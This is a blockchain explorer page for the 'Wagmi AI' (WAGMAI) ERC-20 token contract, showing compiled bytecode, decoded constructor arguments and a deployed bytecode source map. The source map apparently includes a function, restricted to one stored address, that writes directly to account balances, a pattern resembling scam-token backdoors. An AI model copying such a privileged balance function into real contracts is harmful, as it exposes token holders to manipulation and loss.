01527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610400565b61087a81604051806060016040528060278152602001610b61602791396001600160a01b03861660009081526001602052604090205491906108fd565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108a9908261063b565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107699085815260200190565b600081848411156109215760405162461bcd60e51b81526004016104009190610a88565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b038116811461099057600080fd5b919050565b6000602082840312156109a6578081fd5b61064782610979565b600080604083850312156109c1578081fd5b6109ca83610979565b91506109d860208401610979565b90509250929050565b6000806000606084860312156109f5578081fd5b6109fe84610979565b9250610a0c60208501610979565b9150604084013590509250925092565b60008060408385031215610a2e578182fd5b610a3783610979565b946020939093013593505050565b600080600060608486031215610a59578283fd5b610a6284610979565b9250602084013560ff81168114610a77578283fd5b929592945050506040919091013590565b6000602080835283518082850152825b81811015610ab457858101830151858201604001528201610a98565b81811115610ac55783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610afa57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680610b1357607f821691505b60208210811415610b3457634e487b7160e01b600052602260045260246000fd5b5091905056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220a52f7b1aca421bb8deaf42105eed262e6460f232a99894b8bdea9fa70afe00ae64736f6c63430008040033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000f86d0c2e1b4bf0785f23add8fdb4262fee5b24300000000000000000000000000000000000000000033b2e3c9fd0803ce800000000000000000000000000000000000000000000000000000000000000000000085761676d6920414900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065741474d41490000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Wagmi AI
Arg [1] : symbol_ (string): WAGMAI
Arg [2] : decimals_ (uint8): 18
Arg [3] : currOwnershipAddr (address): 0xF86D0C2E1B4bF0785F23ADD8FDb4262FeE5b2430
Arg [4] : totalSupply_ (uint256): 1000000000000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 000000000000000000000000f86d0c2e1b4bf0785f23add8fdb4262fee5b2430
Arg [4] : 0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [6] : 5761676d69204149000000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [8] : 5741474d41490000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

13784:5871:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14645:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15680:210;;;;;;:::i;:::-;;:::i;:::-;;;2089:14:1;;2082:22;2064:41;;2052:2;2037:18;15680:210:0;2019:92:1;14946:108:0;15034:12;;14946:108;;;6028:25:1;;;6016:2;6001:18;14946:108:0;5983:76:1;15898:455:0;;;;;;:::i;:::-;;:::i;14847:91::-;14921:9;;14847:91;;14921:9;;;;6206:36:1;;6194:2;6179:18;14847:91:0;6161:87:1;16361:300:0;;;;;;:::i;:::-;;:::i;15062:177::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15213:18:0;15181:7;15213:18;;;:9;:18;;;;;;;15062:177;5578:94;;;:::i;:::-;;4927:87;4973:7;5000:6;4927:87;;-1:-1:-1;;;;;5000:6:0;;;1862:51:1;;1850:2;1835:18;4927:87:0;1817:102:1;14744:95:0;;;:::i;17846:325::-;;;;;;:::i;:::-;;:::i;16669:401::-;;;;;;:::i;:::-;;:::i;15247:216::-;;;;;;:::i;:::-;;:::i;15471:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15637:18:0;;;15605:7;15637:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15471:201;5827:192;;;;;;:::i;:::-;;:::i;14645:91::-;14690:13;14723:5;14716:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14645:91;:::o;15680:210::-;15799:4;15821:39;3725:10;15844:7;15853:6;15821:8;:39::i;:::-;-1:-1:-1;15878:4:0;15680:210;;;;:::o;15898:455::-;16038:4;16055:36;16065:6;16073:9;16084:6;16055:9;:36::i;:::-;16102:221;16125:6;3725:10;16173:139;16229:6;16173:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16173:19:0;;;;;;:11;:19;;;;;;;;3725:10;16173:33;;;;;;;;;;:37;:139::i;:::-;16102:8;:221::i;:::-;-1:-1:-1;16341:4:0;15898:455;;;;;:::o;16361:300::-;3725:10;16476:4;16570:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16570:34:0;;;;;;;;;;16476:4;;16498:133;;16548:7;;16570:50;;16609:10;16570:38;:50::i;5578:94::-;4973:7;5000:6;-1:-1:-1;;;;;5000:6:0;3725:10;5147:23;5139:68;;;;-1:-1:-1;;;5139:68:0;;4152:2:1;5139:68:0;;;4134:21:1;;;4171:18;;;4164:30;4230:34;4210:18;;;4203:62;4282:18;;5139:68:0;;;;;;;;;5643:21:::1;5661:1;5643:9;:21::i;:::-;5578:94::o:0;14744:95::-;14791:13;14824:7;14817:14;;;;;:::i;17846:325::-;17131:8;;-1:-1:-1;;;;;17131:8:0;3725:10;17131:24;17113:74;;;;-1:-1:-1;;;17113:74:0;;5324:2:1;17113:74:0;;;5306:21:1;5363:2;5343:18;;;5336:30;5402:29;5382:18;;;5375:57;5449:18;;17113:74:0;5296:177:1;17113:74:0;18018:1:::1;18008:6;:11;;;;17986:104;;;::::0;-1:-1:-1;;;17986:104:0;;3740:2:1;17986:104:0::1;::::0;::::1;3722:21:1::0;3779:2;3759:18;;;3752:30;3818:34;3798:18;;;3791:62;-1:-1:-1;;;3869:18:1;;;3862:41;3920:19;;17986:104:0::1;3712:233:1::0;17986:104:0::1;18101:13;18153:10;18101:13:::0;18153:2;:10:::1;:::i;:::-;-1:-1:-1::0;;;;;18129:21:0;;::::1;;::::0;;;:9:::1;:21;::::0;;;;:34;;;;-1:-1:-1;;;17846:325:0:o;16669:401::-;16789:4;16811:229;3725:10;16861:7;16883:146;16940:15;16883:146;;;;;;;;;;;;;;;;;3725:10;16883:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16883:34:0;;;;;;;;;;;;:38;:146::i;15247:216::-;15369:4;15391:42;3725:10;15415:9;15426:6;15391:9;:42::i;5827:192::-;4973:7;5000:6;-1:-1:-1;;;;;5000:6:0;3725:10;5147:23;5139:68;;;;-1:-1:-1;;;5139:68:0;;4152:2:1;5139:68:0;;;4134:21:1;;;4171:18;;;4164:30;4230:34;4210:18;;;4203:62;4282:18;;5139:68:0;4124:182:1;5139:68:0;-1:-1:-1;;;;;5916:22:0;::::1;5908:73;;;::::0;-1:-1:-1;;;5908:73:0;;3333:2:1;5908:73:0::1;::::0;::::1;3315:21:1::0;3372:2;3352:18;;;3345:30;3411:34;3391:18;;;3384:62;-1:-1:-1;;;3462:18:1;;;3455:36;3508:19;;5908:73:0::1;3305:228:1::0;5908:73:0::1;5992:19;6002:8;5992:9;:19::i;:::-;5827:192:::0;:::o;9013:98::-;9071:7;9098:5;9102:1;9098;:5;:::i;:::-;9091:12;9013:98;-1:-1:-1;;;9013:98:0:o;19031:382::-;-1:-1:-1;;;;;19167:19:0;;19159:69;;;;-1:-1:-1;;;19159:69:0;;4918:2:1;19159:69:0;;;4900:21:1;4957:2;4937:18;;;4930:30;4996:34;4976:18;;;4969:62;-1:-1:-1;;;5047:18:1;;;5040:35;5092:19;;19159:69:0;4890:227:1;19159:69:0;-1:-1:-1;;;;;19247:21:0;;19239:69;;;;-1:-1:-1;;;19239:69:0;;5680:2:1;19239:69:0;;;5662:21:1;5719:2;5699:18;;;5692:30;5758:34;5738:18;;;5731:62;-1:-1:-1;;;5809:18:1;;;5802:33;5852:19;;19239:69:0;5652:225:1;19239:69:0;-1:-1:-1;;;;;19321:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19373:32;;6028:25:1;;;19373:32:0;;6001:18:1;19373:32:0;;;;;;;;19031:382;;;:::o;17225:613::-;-1:-1:-1;;;;;17365:20:0;;17357:71;;;;-1:-1:-1;;;17357:71:0;;2926:2:1;17357:71:0;;;2908:21:1;2965:2;2945:18;;;2938:30;3004:34;2984:18;;;2977:62;-1:-1:-1;;;3055:18:1;;;3048:36;3101:19;;17357:71:0;2898:228:1;17357:71:0;-1:-1:-1;;;;;17447:23:0;;17439:72;;;;-1:-1:-1;;;17439:72:0;;4513:2:1;17439:72:0;;;4495:21:1;4552:2;4532:18;;;4525:30;4591:34;4571:18;;;4564:62;-1:-1:-1;;;4642:18:1;;;4635:34;4686:19;;17439:72:0;4485:226:1;17439:72:0;17604:109;17640:6;17604:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17604:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17584:17:0;;;;;;;:9;:17;;;;;;:129;;;;17747:20;;;;;;;:32;;17772:6;17747:24;:32::i;:::-;-1:-1:-1;;;;;17724:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17795:35;;;;;;;;;;17823:6;6028:25:1;;6016:2;6001:18;;5983:76;11292:240:0;11412:7;11473:12;11465:6;;;;11457:29;;;;-1:-1:-1;;;11457:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11508:5:0;;;11292:240::o;6027:173::-;6083:16;6102:6;;-1:-1:-1;;;;;6119:17:0;;;-1:-1:-1;;;;;;6119:17:0;;;;;;6152:40;;6102:6;;;;;;;6152:40;;6083:16;6152:40;6027:173;;:::o;14::1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:2;;177:1;174;167:12;111:2;63:124;;;:::o;192:196::-;251:6;304:2;292:9;283:7;279:23;275:32;272:2;;;325:6;317;310:22;272:2;353:29;372:9;353:29;:::i;393:270::-;461:6;469;522:2;510:9;501:7;497:23;493:32;490:2;;;543:6;535;528:22;490:2;571:29;590:9;571:29;:::i;:::-;561:39;;619:38;653:2;642:9;638:18;619:38;:::i;:::-;609:48;;480:183;;;;;:::o;668:338::-;745:6;753;761;814:2;802:9;793:7;789:23;785:32;782:2;;;835:6;827;820:22;782:2;863:29;882:9;863:29;:::i;:::-;853:39;;911:38;945:2;934:9;930:18;911:38;:::i;:::-;901:48;;996:2;985:9;981:18;968:32;958:42;;772:234;;;;;:::o;1011:264::-;1079:6;1087;1140:2;1128:9;1119:7;1115:23;1111:32;1108:2;;;1161:6;1153;1146:22;1108:2;1189:29;1208:9;1189:29;:::i;:::-;1179:39;1265:2;1250:18;;;;1237:32;;-1:-1:-1;;;1098:177:1:o;1280:431::-;1355:6;1363;1371;1424:2;1412:9;1403:7;1399:23;1395:32;1392:2;;;1445:6;1437;1430:22;1392:2;1473:29;1492:9;1473:29;:::i;:::-;1463:39;;1552:2;1541:9;1537:18;1524:32;1596:4;1589:5;1585:16;1578:5;1575:27;1565:2;;1621:6;1613;1606:22;1565:2;1382:329;;1649:5;;-1:-1:-1;;;1701:2:1;1686:18;;;;1673:32;;1382:329::o;2116:603::-;2228:4;2257:2;2286;2275:9;2268:21;2318:6;2312:13;2361:6;2356:2;2345:9;2341:18;2334:34;2386:4;2399:140;2413:6;2410:1;2407:13;2399:140;;;2508:14;;;2504:23;;2498:30;2474:17;;;2493:2;2470:26;2463:66;2428:10;;2399:140;;;2557:6;2554:1;2551:13;2548:2;;;2627:4;2622:2;2613:6;2602:9;2598:22;2594:31;2587:45;2548:2;-1:-1:-1;2703:2:1;2682:15;-1:-1:-1;;2678:29:1;2663:45;;;;2710:2;2659:54;;2237:482;-1:-1:-1;;;2237:482:1:o;6253:229::-;6293:3;6324:1;6320:6;6317:1;6314:13;6311:2;;;-1:-1:-1;;;6350:33:1;;6406:4;6403:1;6396:15;6436:4;6357:3;6424:17;6311:2;-1:-1:-1;6467:9:1;;6301:181::o;6487:380::-;6566:1;6562:12;;;;6609;;;6630:2;;6684:4;6676:6;6672:17;6662:27;;6630:2;6737;6729:6;6726:14;6706:18;6703:38;6700:2;;;6783:10;6778:3;6774:20;6771:1;6764:31;6818:4;6815:1;6808:15;6846:4;6843:1;6836:15;6700:2;;6542:325;;;:::o

Swarm Source

ipfs://a52f7b1aca421bb8deaf42105eed262e6460f232a99894b8bdea9fa70afe00ae
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.